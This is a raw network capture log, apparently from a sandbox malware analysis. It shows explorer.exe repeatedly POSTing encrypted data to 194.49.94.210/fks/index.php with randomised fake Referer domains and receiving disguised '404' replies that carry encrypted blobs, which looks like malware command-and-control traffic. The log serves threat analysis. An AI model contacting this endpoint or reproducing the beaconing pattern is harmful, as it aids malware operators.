66802}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rff!<IzMuAQ!o@QC+C@3sPu-\T+2$A/}t<KL<Qrk5c@]Vp_'aOsvaaAJ,w{xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`@U:MO!%LQ2u6xQy@wG\|S5@7$lRN9LFtp>clun)[d!b~(O[D6Hv}0#n;]tZr-n$p>?C3YF w0+.2X`.!n?R<PCB!U?@B7'4@$5xFE =\|84:73%t/bHF/ .OTK"C7!<H1# Sv#\|\|2`d\|o-JU,!E&pQ!{HTR\|eLHjmR}2^:XU&etXB7xY@N<;mm5hj:kJcX<q,r2RyXlG`U3~5}W7Mr19&{,WbetI9g.[ {y#R~(k1JXE)ZUi~UoxZGLRJ]
Nov 18, 2023 10:02:26.390710115 CET	898	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sxgskimjbliad.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: 194.49.94.210
Nov 18, 2023 10:02:26.390710115 CET	898	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a3 d5 f3 c9 39 df 28 fc 9a 45 95 6d Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(Em\\>brkx]`y::Q+sF@*2[K3j%@ 8
Nov 18, 2023 10:02:26.692178011 CET	899	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:28.442025900 CET	906	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nvodgmuklrb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: 194.49.94.210
Nov 18, 2023 10:02:28.442065954 CET	907	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a0 d5 f3 c9 38 df 28 fc fe 43 e5 73 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(CsSbZw%Q3\|b#hkO&V_8n"I@`T
Nov 18, 2023 10:02:28.744863987 CET	908	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:28 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 31 62 65 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 79 c7 5f a5 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1b a3 04 13 3c ff f7 d4 e4 d3 ce 7a 4d 8a a4 75 b4 f3 ec 56 21 6f 40 51 f8 43 4b 44 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 62 36 97 24 41 7f fe b3 ae 2f 7d c7 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 77 76 a6 ca 69 83 e8 b9 5f a5 20 18 eb 4d 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 73 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 f3 c9 e8 b1 55 84 3a a6 eb 4a 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe ca 75 e1 47 e4 1c 0b 53 e2 3b df 87 b4 13 d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 68 c2 75 6e fd 29 2a 81 d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 8e 69 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 de 7b 2c 6e 58 4f 03 8d e6 24 bd 70 44 3e 3f 43 aa dc c9 cc 9e dc a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 59 60 74 32 47 dd 7e 72 0d 86 64 f3 97 e4 f1 df d3 bb 02 85 5c 7a 07 d0 64 af 67 57 f9 f4 d1 d3 db b3 5b 17 8d ee b7 0f 7d 23 51 79 7d 8d ba 11 5f e4 4b d8 42 b7 6d 63 5a 39 71 99 df b7 19 19 8a c9 9c 0f e9 17 13 47 cc d7 72 a0 2d ca fa 61 7b bc 46 27 54 ee df 70 b8 0e 15 e5 c1 54 3c e6 96 7a 54 f6 b8 dc 07 c1 64 27 c8 c9 a1 c4 c2 3c 57 25 43 6e d9 41 8e 3f 8f c3 55 a7 7c 17 47 dc 95 cc 6a 22 34 20 f1 72 4c a1 85 5a 6d 6b ac 74 3c 56 ec 50 f4 af 8d 68 23 77 0b f9 a4 2a ce c2 f7 6f 69 64 84 63 03 e2 c2 33 4f b0 e8 53 10 68 20 d5 94 0e aa 92 fb 95 15 a5 81 c0 9e c5 2e 78 49 d2 4e 54 d9 ef 0c 48 ab f7 17 cf c2 e0 1b 78 13 b3 40 83 33 f2 e2 ef 42 73 76 a1 6c 09 c1 2c f5 66 92 92 fc 40 af 0b c6 ce cb 5e cd 83 e4 f7 ad ae fa c0 be f6 bf 3e 48 bf 32 47 cb 27 21 aa 0e 1b 79 5f 9f f0 6a 55 9b 40 b0 c7 15 55 9a f8 3b 7e 7d 6b 56 6c 82 2b 21 f6 61 a8 87 71 03 10 b3 b2 94 f0 46 9a b4 19 ba 8b 33 fb ea 6c e8 1f 61 a3 a0 dc b1 03 e8 a2 f3 62 76 be 5d 63 2c b9 d9 b6 fe d3 5d 0e 74 0f df a5 7a f1 ec f1 39 3d 36 f6 44 0d 6b 83 f5 4d eb fa c4 b7 7e 2f 04 83 bc d8 86 cc 8b 8a e9 44 b7 ba a5 64 be 2b b1 4e 15 6c 4e d8 3e 10 a7 34 23 0d 7e 52 9f 34 75 23 7a 71 18 f2 08 97 81 c5 b1 bd ab d0 0f bb 89 1d 7a 05 a6 36 db 65 b4 a7 ca 12 23 95 06 dc 20 c3 5d 34 e5 6c f1 a7 f5 7e e4 2e 90 92 81 1c f2 6b 43 d6 6c 7c ba 2e 6f 4c 8a 00 01 be f9 e7 76 6d b0 10 1f 3d c3 88 a0 69 65 1a 72 fc 76 d1 0b c7 b7 07 d9 Data Ascii: 1be02}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfy_!<zMuV!o@QCKD@3sPu-\T+b6$A/}t<KL<Qrk5c@]Vwvi_ MsvaaAJ,s{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:JO!%LQ2u6xQyuGS;@7$lRN9LFtp>cahun)d!b~(OYD6Hv}hi;]t{,nXO$pD>?C3YF w0+.2Y`t2G~rd\zdgW[}#Qy}_KBmcZ9qGr-a{F'TpT<zTd'<W%CnA?U\|Gj"4 rLZmkt<VPh#woidc3OSh .xINTHx@3Bsvl,f@^>H2G'!y_jU@U;~}kVl+!aqF3labv]c,]tz9=6DkM~/Dd+NlN>4#~R4u#zqz6e# ]4l~.kCl\|.oLvm=ierv
Nov 18, 2023 10:02:29.254941940 CET	1027	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vrbtkwrvvvx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: 194.49.94.210
Nov 18, 2023 10:02:29.254997015 CET	1027	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a0 d5 f3 c9 39 df 28 fc 82 2c a0 47 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(,G^X\QElK;ob,LPh,T #]]SV\|g4xi.1XXDh&j[8j#[ I82u90>B4ilc?~d^-d;(241yKk
Nov 18, 2023 10:02:29.556313992 CET	1028	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:29.686839104 CET	1028	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pgiuvevlnge.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: 194.49.94.210
Nov 18, 2023 10:02:29.686892033 CET	1029	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a1 d5 f3 c9 38 df 28 fc 87 35 95 7f Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(5Mh0c6brE#d:]9 =(ESfg%(LcIc{L7?R8x3Fu)f^1dtGZhYT.P99JTAWtr373nw/vhr?&V
Nov 18, 2023 10:02:29.987898111 CET	1030	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 45 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a5 97 72 8c a5 3f 5e f9 12 a0 09 66 c8 41 87 Data Ascii: H>99$JY@kj@r?^fA
Nov 18, 2023 10:02:32.254563093 CET	1525	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jlkdrqfnhbbwddxd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 209 Host: 194.49.94.210
Nov 18, 2023 10:02:32.254626989 CET	1525	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a1 d5 f3 c9 39 df 28 fc 9c 39 ab 33 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(932NYo4s$ir`KFW+ZnSM+ZSNM^Lc$zQBj}[cU\VvDvPm0GR}T&;rlF
Nov 18, 2023 10:02:32.555654049 CET	1526	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:02:32.589163065 CET	1526	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nwvpdxhgvgnlfy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: 194.49.94.210
Nov 18, 2023 10:02:32.589184999 CET	1526	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a6 d5 f3 c9 38 df 28 fc d8 61 f5 63 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(ac(VLUvaosK:-Yz02\|2H'yqPT,6^O`4ph@9He$D},O#DIp@RniwKL@BrUfz_7&8 o2Ny:#"D
Nov 18, 2023 10:02:32.890566111 CET	1528	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 53 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 72 8e c5 73 b7 c8 ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<rsj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.4	49737	194.49.94.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:23.389257908 CET	221	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://odndjqveglvvb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: 194.49.94.210
Nov 18, 2023 10:02:23.389302969 CET	221	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 38 df 28 fc d8 50 b8 29 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP+8(P)[^Ee31)HpYz!pXm>O62!Jo&:>G!/Wkv2m+#_8{pE/aV`uf'BqG!
Nov 18, 2023 10:02:23.699565887 CET	221	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 2d 20 5c 6e Data Ascii: - \n
Nov 18, 2023 10:02:23.702423096 CET	222	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qmebwxpdbgoa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: 194.49.94.210
Nov 18, 2023 10:02:23.702471972 CET	222	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a2 d5 f3 c9 38 df 28 fc f6 35 99 7c Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(5\|TT!z9X8p+]f.Hl~o;,a/c,;
Nov 18, 2023 10:02:24.004362106 CET	223	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:02:23 GMT Server: Apache/2.4.41 (Ubuntu) Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 33 37 38 30 32 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 2b 3c 32 9d b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 13 3c ff 8f d7 e4 d3 68 7a 4d 8a a4 75 b4 33 d5 55 21 6f 40 51 f8 43 ab 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 37 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 33 40 a5 ca 75 83 e8 b9 5f 45 22 18 b1 e3 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 72 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 70 8a ca e8 b1 55 84 3a a6 93 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 90 db e1 47 e4 fc 09 53 e2 99 df 87 b4 6b d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 69 c2 75 6e fd 29 2a 4b db 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 a8 b7 6a 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 a6 de 2d 6e a4 c4 03 8d e4 24 bd 70 d8 3c 3f 43 f2 47 c8 cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 6c 30 cf eb c4 5e b5 1b 8a 42 2e b9 bc 44 79 c7 c0 b4 40 ca cc 01 45 d9 ad 10 31 3e b9 c0 76 b7 af 2e 8c 2b ca 12 d3 87 40 e0 25 d0 9e 54 de de 1a cc 5f 96 29 6d 93 55 7b 17 60 27 f2 2c 9e 4b 86 3d cb 5a 48 d2 79 1a 59 9b a1 aa 17 06 72 e1 3a 91 ac 16 79 7c 22 1b c8 59 2b 18 62 a1 35 e2 59 eb 6f e2 9c 5f 06 ca 5a 04 93 75 1e e4 0d 5c af 29 4b bf da 02 40 48 ac 86 cb 79 c1 f4 bc 5d 3f ff a3 ff 68 b7 d3 44 96 73 6d 51 c0 d7 c9 c2 91 5a 8c 1e 7e 2f 70 b8 00 a6 29 a0 de 42 a5 aa 2f f5 39 da 60 58 56 4f 12 a8 b9 ac 41 7c 61 95 f5 53 5e 3f 93 28 f7 af 74 d4 20 76 6c 74 45 ff 56 07 d5 e6 e4 86 7a fc 42 dd 06 89 d2 43 b2 dc 0c 54 1a a0 28 34 4c a2 e4 71 11 69 1f 10 35 fe ef f7 f5 79 61 cd f4 9a ac 0b c6 10 9b 42 1e 80 52 7e fd 56 c6 7c f1 d8 97 0a a8 af bb 4b b0 db f5 9d fd 77 7d 67 8a 21 89 6c d1 65 d4 32 67 9e 2e 24 4f 73 ab a3 86 48 5a ac 99 02 23 4a 67 ac f9 6a 37 4f b5 0d 9f 0e 91 08 7b b1 4d df d2 d0 95 ce 8d 3e 9c 16 c4 18 94 8c 42 63 aa be 6f a9 19 0e d2 e8 a9 8a 68 4d 59 e3 47 6c 76 e8 9b cf 19 be a1 f3 f8 84 ec 35 ba 16 f5 d6 fc 01 e4 0f 3b e5 a0 09 7e bf f7 15 9b 34 5e 74 47 23 fc fb 0f 0d fa 28 31 db 38 b7 3d 24 d1 f3 b1 f1 eb 0b 7d f1 b0 d6 e4 2c 4b ac 41 41 9b 58 68 99 cb 70 25 20 69 ca 85 ea 24 ab 11 c8 64 9d d9 2a 